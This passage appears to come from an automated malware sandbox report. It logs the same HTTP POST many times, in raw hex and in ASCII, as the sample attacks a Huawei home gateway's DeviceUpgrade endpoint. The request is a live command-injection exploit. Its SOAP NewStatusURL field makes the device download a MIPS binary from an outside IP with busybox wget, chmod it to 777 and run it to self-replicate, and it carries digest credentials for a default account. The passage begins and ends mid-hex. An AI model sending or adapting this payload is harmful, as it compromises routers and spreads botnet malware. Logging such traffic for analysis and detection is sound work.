6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 